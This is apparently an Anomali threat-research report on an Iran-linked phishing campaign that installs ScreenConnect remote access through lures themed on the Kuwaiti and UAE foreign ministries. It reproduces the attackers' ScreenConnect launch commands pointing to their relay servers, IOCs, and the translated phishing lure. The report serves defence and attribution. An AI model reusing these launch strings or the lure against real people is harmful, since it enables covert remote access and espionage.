launch parameters are:</p> <div class="break-word"> <p>"C:\Program Files
(x86)\ScreenConnect Client (a97eeae2330a1851)\ScreenConnect.ClientService.exe"
"?e=Access&amp;y=Guest&amp;h=instance-uwct38-relay.screenconnect.com&amp;p=443&amp;s=defc756e-8027-47b6-b67f-400b5152b0f9&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQAtuFTxmBL02KmPrJD46iRMPemIxmEf5ugjlUMfa193CjLMeH9pna2eM0ZGHYhe3MZHUEAByA4fhpInP5kKnkrPl%2fjhxwjHSIaKZ%2bMobL27iSLf8tgmCtGJTTZndViJcMcp4v0yqJOMxVuUdPraZ%2fTvrw6wZpECq7LCGncZGOri%2fqQVFUqsIDZZzhQye6zfkCg0DgxxPf4aQzjgqQo20dJeQDIEEb0sy7FPiSde3VVxTmp%2fMB3Ho%2bK3mobu743glaeTOq0aIsvXASRKb5xB1f4pFUMi1mETUoGgWL%2f6qhNk65scRZmECWvs7O8ajulQMiSPQj9lUOejdBR9taEB8Byz&amp;t=&amp;c=mofa&amp;c=mofa.gov.kw&amp;c=mofa&amp;c=pc&amp;c=&amp;c=&amp;c=&amp;c="</p>
</div> <p>While the ScreenConnectclient agent is being installed, the server
component expects a connection and the server can identify the client agent
through a public key thumbprint. The thumbprint is a 16 character string located
at "C:\Program Files (x86)\ScreenConnect Client
(<strong>a97eeae2330a1851</strong>)”</p> <p>Analysis of the authentic launch
parameters passed back to the server as part of Screenconnect functionality is
shown in Table 2 below.</p> <p style="text-align: center;"><em><strong>Table 2
</strong>- ScreenConnect Launch Parameters</em></p> <table class="table
table-striped break-word"> <thead> <tr> <th>Launch Parameter</th>
<th>Description</th> </tr> </thead> <tbody> <tr> <td>e=Access</td> <td>Session
type: access, meet, support.</td> </tr> <tr> <td>y=Guest</td> <td>ProcessType
(Guest or Host).</td> </tr> <tr>
<td>h=instance-sy9at2-relay.screenconnect.com</td> <td>URI to reach server’s
relay service.</td> </tr> <tr> <td>p=443</td> <td>Port on which relay service
operates</td> </tr> <tr> <td>s=6a1e6739-ad4f-4759-8c69-dfe896b9a817</td> <td>The
GUID to identify the client.</td> </tr> <tr>
<td>k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv</td>
<td>The encoded encryption key used to verify the identity.</td> </tr> <tr>
<td>&amp;t</td> <td>Is not defined and is the NameCallback Format if the name of
the session was to be given.</td> </tr> </tbody> </table> <p>The main launch
parameter that indicates this EXE is designed to target MOFAs are the custom c
parameters:</p> <ul> <li>&amp;c=mofa</li> <li>&amp;c=mofa.gov.kw</li> </ul>
<p>These parameters contain predefined properties that can allow an actor to
know which target, or from where, has been infected. In this example the
infected target is MOFA.</p> <h3>Second Executable</h3> <p>المنح الدراسیة
.exe</p> <p>The ScreenConnect launch parameters from المنح الدراسیة .exe is
shown below:</p> <div class="break-word"> <p>"C:\Program Files
(x86)\ScreenConnect Client (03b9d0ec9210f109)\ScreenConnect.ClientService.exe"
"?e=Access&amp;y=Guest&amp;h=instance-sy9at2-relay.screenconnect.com&amp;p=443&amp;s=6a1e6739-ad4f-4759-8c69-dfe896b9a817&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv&amp;t=&amp;c=mfa&amp;c=mfa.gov&amp;c=mfa&amp;c=pc&amp;c=&amp;c=&amp;c=&amp;c="</p>
</div> <p>The actors again created a custom field parameter, however, this one
is kept to a generic MOFA targeting that appears as MFA:</p> <ul>
<li>&amp;c=mfa&amp;c=mfa.gov</li> </ul> <h2>Conclusion</h2> <p>Utilizing
legitimate software for malicious purposes can be an effective way for threat
actors to obfuscate their operations. In this latest example, Static Kitten is
very likely using features of ScreenConnect to steal sensitive information or
download malware for additional cyber operations. As Static Kitten is assessed
to be primarily focused on cyberespionage, it is very likely that data-theft is
the primary objective behind propagating ScreenConnect to government agency
employees.</p> <p>We will continue monitoring this group for additional
malicious activity and provide details when appropriate.</p> <h2>MITRE TTPs</h2>
<p>Masquerading - T1036<br/> Phishing - T1566<br/> Remote Access Software -
T1219<br/> Spearphishing Attachment - T1566.001<br/> Spearphishing Link -
T1566.002<br/> User Execution - T1204<br/> User Execution: Malicious File -
T1204.002</p> <h2>Endnotes</h2> <p><sup>[1]</sup> ClearSky Cyber Security,
“Operation Quicksand: Muddywater’s Offensive Attack Against Israeli
Organizations,” ClearSky, accessed February 8, 2021, published October 2020,
https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf,
3.</p> <p><sup>[2]</sup> MuddyWater,” MITRE, accessed February 8, 2021
https://attack.mitre.org/groups/G0069/.</p> <p><sup>[3]</sup> “Kuwait willing to
mediate between Iran and Saudi,” Middle East Monitor, accessed February 8, 2021,
published February 4, 2021,
https://www.middleeastmonitor.com/20210204-kuwait-willing-to-mediate-between-iran-and-saudi/.</p>
<p><sup>[4]</sup> Attila Shumelby, “Intelligence Minister Eli Cohen: Netanyahu
secretly visited other countries besides the Emirates,” Ynet, accessed February
8, 2021, published, September 9, 2020,
https://www.ynet.co.il/news/article/S1v00IFsXP; Jonathan Josephs, “Israel-UAE
peace deal ‘big’ for trade in Middle East,” BBC News, accessed February 8, 2021,
published October 16, 2020, https://www.bbc.com/news/business-54574022.</p>
<p><sup>[5]</sup> ClearSky Cyber Security, “Operation Quicksand: Muddywater’s
Offensive Attack Against Israeli Organizations,” ClearSky, 23.</p>
<p><sup>[6]</sup> Ibid.</p> <p><sup>[7]</sup> “Wipro Intruders Targeted Other
Major IT Firms,” KrebsOnSecurity, accessed February 8, 2021, published April 18,
2019,
https://krebsonsecurity.com/2019/04/wipro-intruders-targeted-other-major-it-firms/#more-47453.</p>
<p><sup>[8]</sup> Ibid.</p> <p><sup>[8]</sup> Alon Groisman, “Connectwise
Control Abused Again to Deliver Zeppelin Ransomware,” Morphisec Blog, accessed
February 8, 2021, published December 18, 2019,
https://blog.morphisec.com/connectwise-control-abused-again-to-deliver-zeppelin-ransomware.</p>
<p><sup>[9]</sup> “CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS,” Tetra
Defense, accessed February 8, 2021,
https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis/.</p>
<p><sup>[9]</sup> “Now Let’s Get Tech-y: ScreenConnect’s three main product
components create a trio of powerful remote functionality,” ConnectWise Control,
accessed February 8, 2021,
https://www.screenconnect.com/Remote-Support?t=2&amp;t=2#:~:text=ScreenConnect%20is%20a%20fully%20functional,remote%20support%20on%20the%20fly.</p>
<p><sup>[10]</sup> Dennis Schwarz, et al., “TA505 Distributeds New SDBbot Remote
Access Trojan with Get2 Downloader, Proofpoint, accessed February 8, 2021,
published October 16, 2019,
https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader.</p>
<h2>IOCs</h2> <p><strong>Docx</strong><br/>
31a35e3b87a7f81449d6f3e195dc0660b5dae4ac5b7cd9a65a449526e8fb7535</p>
<p><strong>EXE</strong><br/>
3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b<br/>
5bfb635c43eb73f25f4e75961a715b96fa764bbe096086fc1e037a7869c7878b</p>
<p><strong>IP</strong><br/> 149.202.216.53</p> <p><strong>URL</strong><br/>
https://ws.onehub.com/files/94otjyvd<br/>
https://ws.onehub.com/files/7w1372el<br/>
instance-sy9at2-relay.screenconnect.com<br/>
instance-uwct38-relay.screenconnect.com</p> <p><strong>ZIP</strong><br/>
b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf<br/>
77505dcec5d67cc0f6eb841f50da7e7c41a69419d50dc6ce17fffc48387452e1</p>
<h2>Appendix A</h2> <p>Gentlemen / employees of government agencies</p> <p>Happy
New Year</p> <p>After a kind greeting ,,,</p> <p>In view of the situation in the
region, especially after the US elections, and concerns about Iran's actions,
joint studies have been conducted between the National Media Council and the
General Secretariat of the Cooperation Council for the Arab States of the Gulf
on counting the political, security and economic consequences of the
normalization of relations between Arab countries and Israel. Consequently, the
draft studies on negotiations on the normalization of relations between Arab
countries and Israel were presented by experts of the member states of the
General Secretariat of the Cooperation Council for the Arab States of the Gulf,
and in this regard, the National Media Council seeks to conduct a comprehensive
survey by the member states.</p> <p>Download the relevant content via the link
below.</p> <p>Analysis and study / normalization of relations / Arab countries
and Israel / https://nmc.gov.ae</p> <p>Yours sincerely</p>


SCREENCONNECT REMOTE ACCESS TOOL UTILIZING MINISTRY OF FOREIGN AFFAIRS-THEMED
EXES AND URLS

Authored by: Gage Mele, Winston Marydasan, and Yury Polozov


KEY FINDINGS

 * Anomali Threat Research identified a campaign targeting government agencies
   in the United Arab Emirates (UAE) and likely the broader Middle East.
 * We assess with medium confidence that the activity is being conducted by
   Iran-nexus cyberespionage group Static Kitten, due to Israeli
   geopolitical-themed lures, Ministry of Foreign Affairs (MOFA) references, and
   the use of file-storage service Onehub that was attributed to their previous
   campaign known as Operation Quicksand.[1]
 * The objective of this activity is to install a remote management tool called
   ScreenConnect (acquired by ConnectWise 2015) with unique launch parameters
   that have custom properties.
 * Malicious executables and URLs used in this campaign are masquerading as the
   Ministry of Foreign Affairs (MOFA) of Kuwait (mofa.gov[.]kw).
 * Another sample, including only MOFA (mfa.gov), could be used for broader
   government targeting.


OVERVIEW

Anomali Threat Research has uncovered malicious activity very likely attributed
to the Iran-nexus cyberespionage group, Static Kitten (Seedworm, MERCURY,
Temp.Zagros, POWERSTATS, NTSTATS, MuddyWater), which is known to target numerous
sectors primarily located in the Middle East.[2] This new campaign, which uses
tactics, techniques, and procedures (TTPs) consistent with previous Static
Kitten activity, uses ScreenConnect launch parameters designed to target any
MOFA with mfa[.]gov as part of the custom field. We found samples specifically
masquerading as the Kuwaiti government and the UAE National Council
respectively, based on references in the malicious samples.

In mid-2020, the UAE and Israel began the process of normalizing relations.
Since then, tensions have further escalated in the region, as reported by
numerous sources. The targeting of Kuwait could be tied to multiple factors,
including Kuwait’s MOFA making a public statement that they were willing to lead
mediation between Iran and Saudi Arabia.[3] Furthermore, in October 2020, trade
numbers for a peace deal between Israel and UAE included an estimate for the
creation of 15,000 jobs and $2 billion in revenue on each side.[4] In that same
month, Static Kitten reportedly conducted Operation Quicksand, which targeted
prominent Israeli organizations and included the use of file-storage service
OneHub.[5]


DETAILS

We identified two lure ZIP files being used by Static Kitten designed to trick
users into downloading a purported report on relations between Arab countries
and Israel, or a file relating to scholarships. The URLs distributed through
these phishing emails direct recipients to the intended file storage location on
Onehub, a legitimate service known to be used by Static Kitten for nefarious
purposes.[6] Anomali Threat Research has identified that Static Kitten is
continuing to use Onehub to host a file containing ScreenConnect.

The delivery URLs found to be part of this campaign are:

 * ws.onehub[.]com/files/7w1372el
 * ws.onehub[.]com/files/94otjyvd

File names in this campaign include:

 * تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.ZIP
 * تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe
 * الدراسیة .zip
 * الدراسیة .exe
 * مشروع .docx

Translated file names

 * Analysis and study of the normalization of relations between the Arab
   countries and Israel httpsmod.gov.kw.zip
 * Analysis and study of the normalization of relations between the Arab
   countries and Israel httpsmod.gov.kw.exe
 * Scholarships.zip
 * Scholarships.exe
 * Project.docx

Static Kitten’s objective is to direct users to a downloader URL
(ws.onehub[.]com/files/7w1372el which downloads a ZIP file) via a phishing email
that impersonates an EXE (تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل
httpsmod[.]gov.kw.exe). This EXE purports to be a report on Arabic countries and
Israel relations but, when executed, actually launches the installation process
for ScreenConnect.

A similar second sample uses .docx file that tries to direct users to
ws.onehub[.]com/files/94otjyvd which downloads a ZIP file called لدراسیة .zip.
An EXE inside the ZIP of the same name will also begin the ScreenConnect
installation process when executed. An overview of the infection chain is shown
in Figure 1below.


Figure 1 - Static Kitten Campaign Infection Chain


LURE DOCUMENT ANALYSIS

Static Kitten is distributing at least two URLs that deliver two different ZIP
files that are themed to be relevant to government agency employees. The URLs
are distributed through phishing emails with lure and decoy documents. An
example lure is shown in Figure 2 below.


Figure 2 – Static Kitten Lure Document .docx

The .docx file shown in Figure 2 directly refers to government agency recipients
while highlighting concerns about recent Iranian actions, the impact of the US
elections, and joint studies by government entities on relations between Arabic
countries and Israel. The actors reference multiple official agencies, including
the General Secretariat of the Cooperation Council for the Arab States of the
Gulf and the UAE National Media Council, likely in an effort to add the
appearance of legitimacy. A full translation of this document can be viewed in
Appendix A. The hyperlink in the .docx file is impersonating the UAE National
Media Council, however, the actual link directs to ws.onehub.com/files/7w1372el.

The second file is a ZIP called الدراسیة .zip (see Figure 3). We cannot
determine the delivery method for this ZIP, but it is likely similar to the
.docx email delivery method of the first download URL. The geopolitical-themed
ZIP contains an EXE file with the same name that begins the installation process
for ScreenConnect when executed (see Figure 4).


Figure 3 – Download URL ws.onehub.com/files/94otjyvd for Malicious ZIP الدراسیة
.zip


Figure 4 - ScreenConnect Installation


TECHNICAL ANALYSIS


SCREENCONNECT AND ONEHUB CONTEXT

Between 2016 and 2020, we have seenScreenConnect and Onehub used in malicious
cyber activity by different, unassociated threat actors. For example, between
2016 and 2019 unknown threat actors targeted IT outsourcing firms, including
compromising US-based Cognizant and India-based Wipro.[7] The actors responsible
for these attacks used ScreenConnect to connect to endpoints on client networks,
enabling them to conduct further lateral movements and automated actions on
objectives. During an incident impacting Cognizant and their client Maritz
Holdings, actors used ScreenConnect to propagate to other connected systems and
caused over $1.8 million (USD) in losses through a gift card fraud scheme.[6] In
2019, another threat group used ConnectWise to execute PowerShell commands in
their target environments. This lead to the delivery of Zeppelin and other
VegaLocker ransomware variants, Vidar information stealer, Cobalt Strike
beacons, PS2EXE tools, and banker Trojans.[7] In 2020, ScreenConnect/ConnectWise
has been utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD,
GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi
ransomware.[8]

Remote desktop management software is a common target and tool used by threat
actors because of the wide variety of functionalities they offer. ScreenConnect
offers three primary functions that each contain different valuable features for
threat actors. ScreenConnect’s capabilities are shown in Table 1 below.

Table 1 - ScreenConnect Capabilities[9]

Feature Functions Remote Support Remote control and viewing of any
internet-connect device. Unattended Access Persistent connection allows
behind-the-scenes, remote control of any machine or server. Meetings Standard
screen-sharing meetings with chat and voice communication, record video, and
take screenshots.

The cybercriminal group Graceful Spider (TA505, Gold Evergreen, TEMP.Warlock,
Hive0065, Chimborazo, FIN11) distributed spearphishing emails impersonating
Onehub in 2019 in attempts to trick users into downloading the SDBbot remote
access trojan (RAT).[10] Onehub’s file-storage services are also utilized in
malspam emails to host various malware, as is common with other file storage
locations abused by multiple threat actors.


FIRST EXECUTABLE

تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod.gov.kw.exe

When a user tries to double click the executable تحليل ودراسة تطبيع العلاقات
الدول العربية واسرائيل httpsmod.gov.kw.exe (Screenconnect payload), it drops the
Microsoft installer file. This begins the installation of the client payload
onto victim machines. While the actors attempted to make the installation appear
legitimate, closer inspection of the client launch parameters reveals the
potential for broader MOFA targeting. The client service launch parameters are:

"C:\Program Files (x86)\ScreenConnect Client
(a97eeae2330a1851)\ScreenConnect.ClientService.exe"
"?e=Access&y=Guest&h=instance-uwct38-relay.screenconnect.com&p=443&s=defc756e-8027-47b6-b67f-400b5152b0f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAtuFTxmBL02KmPrJD46iRMPemIxmEf5ugjlUMfa193CjLMeH9pna2eM0ZGHYhe3MZHUEAByA4fhpInP5kKnkrPl%2fjhxwjHSIaKZ%2bMobL27iSLf8tgmCtGJTTZndViJcMcp4v0yqJOMxVuUdPraZ%2fTvrw6wZpECq7LCGncZGOri%2fqQVFUqsIDZZzhQye6zfkCg0DgxxPf4aQzjgqQo20dJeQDIEEb0sy7FPiSde3VVxTmp%2fMB3Ho%2bK3mobu743glaeTOq0aIsvXASRKb5xB1f4pFUMi1mETUoGgWL%2f6qhNk65scRZmECWvs7O8ajulQMiSPQj9lUOejdBR9taEB8Byz&t=&c=mofa&c=mofa.gov.kw&c=mofa&c=pc&c=&c=&c=&c="

While the ScreenConnectclient agent is being installed, the server component
expects a connection and the server can identify the client agent through a
public key thumbprint. The thumbprint is a 16 character string located at
"C:\Program Files (x86)\ScreenConnect Client (a97eeae2330a1851)”

Analysis of the authentic launch parameters passed back to the server as part of
Screenconnect functionality is shown in Table 2 below.

Table 2 - ScreenConnect Launch Parameters

Launch Parameter Description e=Access Session type: access, meet, support.
y=Guest ProcessType (Guest or Host). h=instance-sy9at2-relay.screenconnect.com
URI to reach server’s relay service. p=443 Port on which relay service operates
s=6a1e6739-ad4f-4759-8c69-dfe896b9a817 The GUID to identify the client.
k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv
The encoded encryption key used to verify the identity. &t Is not defined and is
the NameCallback Format if the name of the session was to be given.

The main launch parameter that indicates this EXE is designed to target MOFAs
are the custom c parameters:

 * &c=mofa
 * &c=mofa.gov.kw

These parameters contain predefined properties that can allow an actor to know
which target, or from where, has been infected. In this example the infected
target is MOFA.


SECOND EXECUTABLE

المنح الدراسیة .exe

The ScreenConnect launch parameters from المنح الدراسیة .exe is shown below:

"C:\Program Files (x86)\ScreenConnect Client
(03b9d0ec9210f109)\ScreenConnect.ClientService.exe"
"?e=Access&y=Guest&h=instance-sy9at2-relay.screenconnect.com&p=443&s=6a1e6739-ad4f-4759-8c69-dfe896b9a817&k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv&t=&c=mfa&c=mfa.gov&c=mfa&c=pc&c=&c=&c=&c="

The actors again created a custom field parameter, however, this one is kept to
a generic MOFA targeting that appears as MFA:

 * &c=mfa&c=mfa.gov


CONCLUSION

Utilizing legitimate software for malicious purposes can be an effective way for
threat actors to obfuscate their operations. In this latest example, Static
Kitten is very likely using features of ScreenConnect to steal sensitive
information or download malware for additional cyber operations. As Static
Kitten is assessed to be primarily focused on cyberespionage, it is very likely
that data-theft is the primary objective behind propagating ScreenConnect to
government agency employees.

We will continue monitoring this group for additional malicious activity and
provide details when appropriate.


MITRE TTPS

Masquerading - T1036
Phishing - T1566
Remote Access Software - T1219
Spearphishing Attachment - T1566.001
Spearphishing Link - T1566.002
User Execution - T1204
User Execution: Malicious File - T1204.002


ENDNOTES

[1] ClearSky Cyber Security, “Operation Quicksand: Muddywater’s Offensive Attack
Against Israeli Organizations,” ClearSky, accessed February 8, 2021, published
October 2020,
https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf,
3.

[2] MuddyWater,” MITRE, accessed February 8, 2021
https://attack.mitre.org/groups/G0069/.

[3] “Kuwait willing to mediate between Iran and Saudi,” Middle East Monitor,
accessed February 8, 2021, published February 4, 2021,
https://www.middleeastmonitor.com/20210204-kuwait-willing-to-mediate-between-iran-and-saudi/.

[4] Attila Shumelby, “Intelligence Minister Eli Cohen: Netanyahu secretly
visited other countries besides the Emirates,” Ynet, accessed February 8, 2021,
published, September 9, 2020, https://www.ynet.co.il/news/article/S1v00IFsXP;
Jonathan Josephs, “Israel-UAE peace deal ‘big’ for trade in Middle East,” BBC
News, accessed February 8, 2021, published October 16, 2020,
https://www.bbc.com/news/business-54574022.

[5] ClearSky Cyber Security, “Operation Quicksand: Muddywater’s Offensive Attack
Against Israeli Organizations,” ClearSky, 23.

[6] Ibid.

[7] “Wipro Intruders Targeted Other Major IT Firms,” KrebsOnSecurity, accessed
February 8, 2021, published April 18, 2019,
https://krebsonsecurity.com/2019/04/wipro-intruders-targeted-other-major-it-firms/#more-47453.

[8] Ibid.

[8] Alon Groisman, “Connectwise Control Abused Again to Deliver Zeppelin
Ransomware,” Morphisec Blog, accessed February 8, 2021, published December 18,
2019,
https://blog.morphisec.com/connectwise-control-abused-again-to-deliver-zeppelin-ransomware.

[9] “CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS,” Tetra Defense, accessed
February 8, 2021,
https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis/.

[9] “Now Let’s Get Tech-y: ScreenConnect’s three main product components create
a trio of powerful remote functionality,” ConnectWise Control, accessed February
8, 2021,
https://www.screenconnect.com/Remote-Support?t=2&t=2#:~:text=ScreenConnect%20is%20a%20fully%20functional,remote%20support%20on%20the%20fly.

[10] Dennis Schwarz, et al., “TA505 Distributeds New SDBbot Remote Access Trojan
with Get2 Downloader, Proofpoint, accessed February 8, 2021, published October
16, 2019,
https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader.


IOCS

Docx
31a35e3b87a7f81449d6f3e195dc0660b5dae4ac5b7cd9a65a449526e8fb7535

EXE
3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b
5bfb635c43eb73f25f4e75961a715b96fa764bbe096086fc1e037a7869c7878b

IP
149.202.216.53

URL
https://ws.onehub.com/files/94otjyvd
https://ws.onehub.com/files/7w1372el
instance-sy9at2-relay.screenconnect.com
instance-uwct38-relay.screenconnect.com

ZIP
b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf
77505dcec5d67cc0f6eb841f50da7e7c41a69419d50dc6ce17fffc48387452e1


APPENDIX A

Gentlemen / employees of government agencies

Happy New Year

After a kind greeting ,,,

In view of the situation in the region, especially after the US elections, and
concerns about Iran's actions, joint studies have been conducted between the
National Media Council and the General Secretariat of the Cooperation Council
for the Arab States of the Gulf on counting the political, security and economic
consequences of the normalization of relations between Arab countries and
Israel. Consequently, the draft studies on negotiations on the normalization of
relations between Arab countries and Israel were presented by experts of the
member states of the General Secretariat of the Cooperation Council for the Arab
States of the Gulf, and in this regard, the National Media Council seeks to
conduct a comprehensive survey by the member states.

Download the relevant content via the link below.

Analysis and study / normalization of relations / Arab countries and Israel /
https://nmc.gov.ae

Yours sincerely





GET THE LATEST ANOMALI UPDATES AND CYBERSECURITY NEWS – STRAIGHT TO YOUR INBOX


Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research,
news, events, and more.
Subscribe Today



EXPLORE MORE TOPICS

Anomali

Anomali Copilot

Anomali Cyber Watch

Anomali Match

Anomali Security Operations Platform

Compliance

Cyber Threat Intelligence

ISAC

Malware

Modern Honey Network

Research

SIEM

SOAR

STAXX

Splunk

Threat Intelligence Platform

ThreatStream

UEBA

Research


808 Winslow Street , Redwood City, 
CA, 94063, United States

+1 844 4 THREATS (847328)

‍+44 8000 148096 (International Toll-Free)

‍general@anomali.com


Platform and Products
Anomali PlatformAnomali CopilotIntegratorAnomali Security AnalyticsAnomali
ThreatStreamAnomali Intelligence Channels
Marketplace
Anomali MarketplaceThreat Intelligence FeedsThreat Analysis Tools and
EnrichmentsSecurity System PartnersMarketplace for Partners
Partners
Partners OverviewJoin the Technology Partner ProgramAnomali SDKsThreat Intel
SharingPartner Portal Login
Resources
Resource LibraryBlogEventsDetect LIVESupport

Company
About AnomaliLeadership
Company
About UsLeadershipCareersPress RoomContact UsSchedule Demo
 
CareersPress Room
 
Contact UsSchedule Demo
© Copyright 2024 Anomali®. All rights reserved. ThreatStream® is a registered
trademark of Anomali Inc. Anomali Match™ ("Match") and Anomali Lens™ ("Lens")
are trademarks of Anomali Inc.

Privacy PolicyTerms of UseCookies PolicySecurity
By clicking “Accept”, you agree to the storing of cookies on your device to
enhance site navigation, analyze site usage, and assist in our marketing
efforts. View our Cookie Policy for more information.
PreferencesDenyAccept


Privacy Preference Center
Our website uses cookies to enhance your experience. Some cookies are essential
for basic functionality, while others are used for marketing, analytics, and
personalization. You can choose to disable certain types of storage that are not
necessary, but this may affect your website experience.
Reject all cookiesAllow all cookies
Manage Consent Preferences by Category
Essential
Always Active
These are required to enable basic website functionality.
Analytics
Essential

These help us understand how the website performs, how visitors interact with
the site, and whether there may be technical issues.
Marketing
Essential

We use these to deliver advertising that is more relevant to you and your
interests. We also use them to limit the number of times you see an
advertisement and measure the effectiveness of advertising campaigns.
Personalization
Essential

These items allow the us to remember choices you make (such as your user name,
language, or the region you are in) and provide enhanced, more personal
features.
Confirm my preferences and close







Platform and Products
The Anomali Platform
Exposure Management
Attack Surface ManagementDigital Risk Protection
Detection and Response
Anomali Security Analytics
Threat Intelligence Management
ThreatStreamAnomali Intel Channels
Security Automation
CopilotLensIntegrator
Free Tools
Anomali Cyber WatchSTAXXThe Anomali Newsletter
Marketplace
Threat Intelligence FeedsThreat Analysis Tools and EnrichmentsSecurity System
PartnersMarketplace for Partners
Partners
Partners OverviewJoin the Technology Partner ProgramAnomali SDKsThreat Intel
SharingPartner Portal Login
Collaborate
Community OverviewCISO EventsCISO ResourcesCISO Blog
Resources
Browse Resource LibraryWhat is Threat Intelligence?What is Security
Analytics?Threat Intelligence SharingWhat is a Threat Intelligence Platform
(TIP)?What are STIX/TAXII?What is MITRE ATT&CK?What is a Cyber Fusion
Center?What is SOAR?
Company
About AnomaliAnomali Press RoomEventsDetect LIVELeadershipReviewsAwardsCareers
Schedule Demo

Contact

Support

Blog
© Copyright 2024 Anomali®. All rights reserved. ThreatStream® is a registered
trademark of Anomali Inc. Anomali Match™ ("Match") and Anomali Lens™ ("Lens")
are trademarks of Anomali Inc.

Privacy PolicyTerms of UseCookies PolicySecurity

By clicking “Accept”, you agree to the storing of cookies on your device to
enhance site navigation, analyze site usage, and assist in our marketing
efforts. View our Cookie Policy for more information.
PreferencesDenyAccept


Privacy Preference Center
Our website uses cookies to enhance your experience. Some cookies are essential
for basic functionality, while others are used for marketing, analytics, and
personalization. You can choose to disable certain types of storage that are not
necessary, but this may affect your website experience.
Reject all cookiesAllow all cookies
Manage Consent Preferences by Category
Essential
Always Active
These are required to enable basic website functionality.
Analytics
Essential

These help us understand how the website performs, how visitors interact with
the site, and whether there may be technical issues.
Marketing
Essential

We use these to deliver advertising that is more relevant to you and your
interests. We also use them to limit the number of times you see an
advertisement and measure the effectiveness of advertising campaigns.
Personalization
Essential

These items allow the us to remember choices you make (such as your user name,
language, or the region you are in) and provide enhanced, more personal
features.
Confirm my preferences and close